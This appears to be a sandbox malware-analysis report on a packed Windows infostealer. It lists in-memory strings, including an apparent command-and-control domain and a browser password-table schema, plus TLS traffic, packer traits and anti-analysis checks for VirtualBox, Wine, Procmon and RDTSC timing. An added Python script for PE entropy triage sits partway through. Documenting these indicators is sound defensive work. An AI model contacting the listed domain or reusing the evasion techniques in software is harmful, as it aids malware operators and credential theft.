Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488788404.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.0000000001812000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488770291.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488938097.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464413683.000000000180B000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1488678588.0000000005FDB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/
Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/4
Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/Win
Source: fer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621827574.000000000182C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619202286.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621698002.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.000000000184D000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1583937093.0000000001887000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569841821.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608270681.000000000182C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537765553.0000000001829000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.0000000001887000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/api
Source: fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apill
Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608570029.000000000184C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/apisZV
Source: fer4JIJGeL.exe, 00000000.00000003.1569841821.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/d
Source: fer4JIJGeL.exe, 00000000.00000003.1619386284.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535408359.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510562445.0000000005FEA000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1624142493.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569626092.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510838458.0000000005FED000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538267549.0000000005FEC000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1512013029.0000000005FED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/ku
Source: fer4JIJGeL.exe, 00000000.00000002.1621946528.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619437137.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/pi
Source: fer4JIJGeL.exe, 00000000.00000003.1583937093.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1608171165.00000000018A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/pil
Source: fer4JIJGeL.exe, 00000000.00000003.1464466166.000000000184C000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mindhandru.buzz/~Z
Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: fer4JIJGeL.exe, 00000000.00000003.1465358750.0000000005F9E000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465500291.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1465424397.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: fer4JIJGeL.exe, 00000000.00000003.1512405754.0000000005FF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: fer4JIJGeL.exe, 00000000.00000003.1511958293.000000000606A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: fer4JIJGeL.exe, 00000000.00000003.1512080231.0000000006281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2

                System Summary

Source: fer4JIJGeL.exe | Static PE information: section name: (blank)
Source: fer4JIJGeL.exe | Static PE information: section name: .idata
Source: fer4JIJGeL.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Code function: 0_3_018711E4
Source: fer4JIJGeL.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: fer4JIJGeL.exe | Static PE information: Section: (blank) ZLIB complexity 0.9995915032679739
Source: fer4JIJGeL.exe | Static PE information: Section: uezamyof ZLIB complexity 0.9945773596744752
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: fer4JIJGeL.exe, 00000000.00000003.1465857694.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1466341726.0000000005F6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: fer4JIJGeL.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File read: C:\Users\user\Desktop\fer4JIJGeL.exe
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Section loaded: ondemandconnroutehelper.dll (this entry is listed 6 times in a row)
Source: fer4JIJGeL.exe | Static file information: File size 1854976 > 1048576
Source: fer4JIJGeL.exe | Static PE information: Raw size of uezamyof is bigger than: 0x100000 < 0x19ae00

                Data Obfuscation

Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Unpacked PE file: 0.2.fer4JIJGeL.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uezamyof:EW;cvgltxxf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uezamyof:EW;cvgltxxf:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: fer4JIJGeL.exe | Static PE information: real checksum: 0x1cdcde should be: 0x1c9e74
Source: fer4JIJGeL.exe | Static PE information: section name: (blank)
Source: fer4JIJGeL.exe | Static PE information: section name: .idata
Source: fer4JIJGeL.exe | Static PE information: section name: (blank)
Source: fer4JIJGeL.exe | Static PE information: section name: uezamyof
Source: fer4JIJGeL.exe | Static PE information: section name: cvgltxxf
Source: fer4JIJGeL.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Code function: 0_3_018734EF push esi; retf 0_3_018734F2 (this entry is listed 12 times)
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Code function: 0_3_01875064 push esi; retf 0_3_01875067 (this entry is listed 12 times)
Source: fer4JIJGeL.exe | Static PE information: section name: (blank) entropy: 7.984706196214209
Source: fer4JIJGeL.exe | Static PE information: section name: uezamyof entropy: 7.953990333526645
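The rows above (blank and randomly named sections, ZLIB complexity and entropy close to 8, an entry point inside .taggant, and the first section changing from ER to EW once unpacked) are the static fingerprint of the packer. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks a PE section table by hand, computes per-section Shannon entropy, renders the memory rights the way the report prints them (E, W, R), and flags the same traits. The PE image it analyses is constructed inside the script, not the analysed file; the 7.0 entropy threshold and the list of "common" section names are this example's own choices.

```python
"""
Static PE section triage: names, entropy and memory rights.

Added example, not part of the Joe Sandbox report or of the sample. The PE
image it analyses is constructed in build_sample_image(); the entropy
threshold and the list of common section names are this example's choices.
"""
import math
import random
import struct
from collections import Counter

# IMAGE_SCN_* flags from the PE/COFF section header Characteristics field.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a stock toolchain emits; anything else (uezamyof, cvgltxxf, ...) is flagged.
COMMON_SECTION_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                        ".edata", ".pdata", ".bss", ".tls", ".CRT"}

# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
# NumberOfLinenumbers, Characteristics  (40 bytes)
SECTION_HEADER = "<8sIIIIIIHHI"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random data."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def rights(characteristics: int) -> str:
    """Render memory rights the way the report does, e.g. 'EWR' or 'ER'."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") \
         + ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "") \
         + ("R" if characteristics & IMAGE_SCN_MEM_READ else "")


def parse_sections(image: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table; one dict per section."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(n_sections):
        (name, _vsize, vaddr, raw_size, raw_ptr,
         _r, _l, _nr, _nl, chars) = struct.unpack_from(SECTION_HEADER, image, table + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0"), "vaddr": vaddr,
                         "characteristics": chars, "entropy": shannon_entropy(raw)})
    return sections


def triage(image: bytes, entropy_threshold: float = 7.0) -> list:
    """Flag the packer traits the report lists: odd names, high entropy, E+W rights."""
    findings = []
    for sec in parse_sections(image):
        raw_name = sec["name"]
        printable = bool(raw_name) and all(0x20 <= b < 0x7F for b in raw_name)
        label = raw_name.decode("ascii") if printable else raw_name.hex()
        flags = []
        if not printable:
            flags.append("non-printable-name")       # the report's blank section names
        elif label not in COMMON_SECTION_NAMES:
            flags.append("uncommon-name")
        if sec["entropy"] > entropy_threshold:
            flags.append("high-entropy")             # 7.98 / 7.95 in the report
        r = rights(sec["characteristics"])
        if "E" in r and "W" in r:
            flags.append("writable-and-executable")  # ':EW' in the unpack row
        findings.append({"name": label, "rights": r,
                         "entropy": round(sec["entropy"], 3), "flags": flags})
    return findings


def build_sample_image(seed: int = 1) -> bytes:
    """Constructed PE32 image (not the analysed file): an unnamed E+R section,
    a normal .rsrc, and a random-named E+W+R section filled with random bytes."""
    rng = random.Random(seed)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))
    plain = b"\0" * 4096
    sections = [
        (b"\x01\x02", plain, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".rsrc", plain, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (b"uezamyof", packed, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    ]
    size_of_optional = 224                            # PE32 optional header size
    image = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))   # e_lfanew = 0x40
    image += b"PE\0\0"
    # Machine=i386, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    image += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, 0x10B)        # PE32 magic
    image += optional
    raw_ptr, vaddr = 0x200, 0x1000
    for name, data, chars in sections:
        image += struct.pack(SECTION_HEADER, name, len(data), vaddr, len(data), raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += len(data)
        vaddr += len(data)
    image += b"\0" * (0x200 - len(image))             # headers end well before 0x200
    for _name, data, _chars in sections:
        image += data                                 # same order as the section table
    return bytes(image)


if __name__ == "__main__":
    for f in triage(build_sample_image()):
        print(f"{f['name']:<10} {f['rights']:<4} {f['entropy']:>6.3f} {', '.join(f['flags'])}")
```

For a real sample, pass the file bytes to `triage`; the report's own values (entropy 7.98 on the unnamed section, 7.95 on uezamyof, the unnamed section going from ER to EW after unpacking) are the pattern it flags. The entry point in .taggant and the checksum mismatch are separate indicators this script does not evaluate.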

                Boot Survival

Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Window searched: window name: FilemonClass (this entry is listed 2 times)
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Window searched: window name: PROCMON_WINDOW_CLASS (this entry is listed 3 times)
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\fer4JIJGeL.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E09774 second address: E0978E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E098E2 second address: E098E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E098E8 second address: E098F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E098F0 second address: E098F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fer4JIJGeL.exe | RDTSC instruction interceptor: First address: E09BA5 second address: E09BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F9F112ED796h 0x00000009 jmp 00007F9F112ED7A8h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9F112ED7A5h 0x0000001b jmp 00007F9F112ED7A5h 0x00000020 rdtsc
